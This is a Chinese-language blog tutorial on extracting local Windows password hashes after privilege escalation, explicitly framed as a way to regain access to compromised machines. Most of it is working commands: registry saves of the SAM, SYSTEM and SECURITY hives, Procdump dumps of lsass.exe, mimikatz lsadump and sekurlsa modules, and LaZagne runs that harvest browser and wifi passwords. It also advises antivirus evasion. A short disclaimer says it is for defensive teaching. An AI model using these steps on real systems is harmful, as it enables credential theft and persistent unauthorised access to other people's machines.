作者：小刚
一位苦于信息安全的萌新小白帽，记得关注给个赞，谢谢
本实验仅用于信息防御教学，切勿用于其它用途

WIN本地获取Hash

win系统密码
为什么要获取本地hash
在哪能找到
几种工具和利用方式
- 1.注册表 + mimikatz
- 2.Procdump + mimikatz
- 3.直接上传mimikatz读取密码
- 4.LaZagne获取所有密码
- 5.其他工具
总结

win系统密码

Win系统使用LM和NTLM两种加密方法对用户的密码进行处理，
两种加密方式在这有介绍Win本地hash概念

但注意的是从win-server-2008开始默认禁止使用LM加密方式
统一使用NTLM方式进行加密处理。
2008之前的如果密码位数超过14，会使用NTLM方法加密。

为什么要获取本地hash

通常在渗透测试过程中，进行完提权之后，通常会进行权限维持，植入木马后门，或者创建一个高权限用户。
但是权限维持也有一定的时间，木马后门等被清理了之后，如果知道被攻击者的账户密码，再次拿下还不是分分钟的事。

在哪能找到

1.在win中，系统密码通常储存在SAM文件中
物理路径：C:\windows\system32\config\SAM

SAM是windows系统的一个系统用户账号管理文件。 win中对用户账户的安全管理使用了安全账号管理器SAM的机制,安全账号管理器对账号的管理是通过安全标识进行的，安全标识在账号创建时就同时创建，一旦账号被删除，安全标识也同时被删除。一旦某个账号被删除，它的安全标识就不再存在了，即使用相同的用户名重建账号，也会被赋予不同的安全标识，不会保留原来的权限。
SAM 文件一旦丢失，会失去所有用户账号。

2.还有就是通过lsass.exe进程，转储内存中的密码。

lsass.exe是微软Windows系统中安全机制相关进程。主要用于本地安全和登陆策略，同时也管理IP相关安全信息。
lsass.exe造成相应的缓冲区溢出，从而从内存中读取密码。
但是，由于lsass.exe进程属于Windows系统核心进程，对lsass.exe攻击会导致服务崩溃，系统容易死机或者卡死。

几种工具和利用方式

将工具上传被攻击机，然后运行程序。

1.注册表 + mimikatz

win对用户密码生成的hash值都会储存在hklm\sam注册表中，
密匙则存放在hklm\system中。
命令行运行（管理员权限）

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive

通过mimikatz工具进行提取hash
(注意：将提取出来的三个文件下载到本地，并移动到mimikatz目录下）

mimikatz.exe
lsadump::sam /sam:sam.hive /system:system.hive /security:security.hive

到在线hash破解网站进行破解。
https://www.objectif-securite.ch/ophcrack

成功拿到本机账户hacker密码123456

或者直接复制文件

C:\windows\system32\config\sam
C:\windows\system32\config\system

mimikatz.exe
lsadump::sam /sam:sam /system:system

2.Procdump + mimikatz

Procdump 是微软官方发布的一款调试工具，可以将lsass.exe 转储成 dmp 文件。
（win运行时不能复制system和sam文件，利用此方法获取系统未清理内存时的登录信息凭证。）

微软的亲儿子怎么可能被当病毒，然后利用mimikatz读取dmp中的密码。

命令行运行（管理员权限）

procdump.exe -accepteula -ma lsass.exe lsass.dmp #32位系统
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统

利用mimikatz读取
(注意：将lsass.dmp文件下载到本地，并移动到mimikatz目录下）

mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

直接读取出LM，NTLM和明文密码123456

3.直接上传mimikatz读取密码

原理是直接上传mimikatz工具，在线读取SAM文件提取hash值
但是要进行免杀处理，并是管理员权限

mimikatz.exe
privilege::debug # 提升权限
token::elevate #假冒令牌。提升权限至 SYSTEM 权限
lsadump::sam #读取sam获取NTLM hash
###################################################################
mimikatz.exe
privilege::debug # 提升权限
log #开启日志记录,储存在mimikatz.log文件中
sekurlsa::logonpasswords #获取明文密码和hash

4.LaZagne获取所有密码

一款获取win密码的神器
可以抓取系统密码、浏览器密码、wifi 密码等等(部分需要权限)

laZagne.exe all #获取所有密码
laZagne.exe browsers #只获取浏览器记住的密码：
laZagne.exe browsers -firefox #只获取firefox记住的密码：
laZagne.exe all -oN #将输出保存到文件

5.其他工具

还有一些老牌的工具也挺好用
像pwdump8，WCE，Quarks Pwdump，GetHsahes等等。
好用是好用，但基本上传就被当病毒给干了，通过免杀啥的或许还能用，可以尝试一下。

总结

本地读取hash的关键点就是要有权限。有权限，干啥都行。
如果抓取的LM Hash为 AAD3B435B51404EEAAD3B435B51404EE
可能密码为空或LM Hash被禁用。

自己整理的工具

可关注微信公众号:XG小刚
回复：hash工具

内网渗透-获取WIN本地用户Hash相关推荐

内网渗透--获取其他电脑相册
内网渗透之其他电脑相册获取工具准备: kali虚拟机设定ip转发终端模式输入命令 echo 1 >/proc/sys/net/ipv4/ip_forward 注意:当机器网络重新启动,这个 ...
内网渗透-域横向smbwmin明文hash传递
文章目录 Procdump+Mimikatz配合获取明文hash Hashcat破解获取Windows NTML Hash 域横向移动SMB445服务利用 Psexec/PsTool Impacket ...
web记录文章浏览数_内网渗透 -- 获取内网浏览器历史记录等相关信息
"我喜欢你,做我女朋友可以吗?" 电话的那头没有反应,男生沉不住气了, 小心翼翼地问着,"你在干嘛呀?" "我在点头." ---- 网易云热 ...
内网渗透(九)之内网信息收集-手动本地信息收集
前言不管是在外网中还是在内网中,信息收集都是重要的第一步.对于内网中的一台机器,其所处内网的结构是什么样的.其角色是什么.使用这台机器的人的角色是什么,以及这台机器上安装了什么杀毒软件.这台机器是 ...
内网渗透-cobaltstrike之cs上线获取shell
cobaltstrike之cs上线获取shell 文章目录 cobaltstrike之cs上线获取shell 前言一.什么是cobaltstrike 二.cs上线获取shell 1.环境搭建 CS安 ...
内网渗透(五十三)之域控安全和跨域攻击-利用域信任密钥获取目标域控
系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内 ...
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内 ...
内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息
系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内 ...
内网渗透-域渗透简单思路
文章目录 1.权限提升 2.渗透姿势爆hash,爆aes key 爆hash 爆aes key 3.远程登录注册表修改连接命令 4.连接操作 PTH攻击(利用明文或hash连接) IPC(明文连 ...

内网渗透-获取WIN本地用户Hash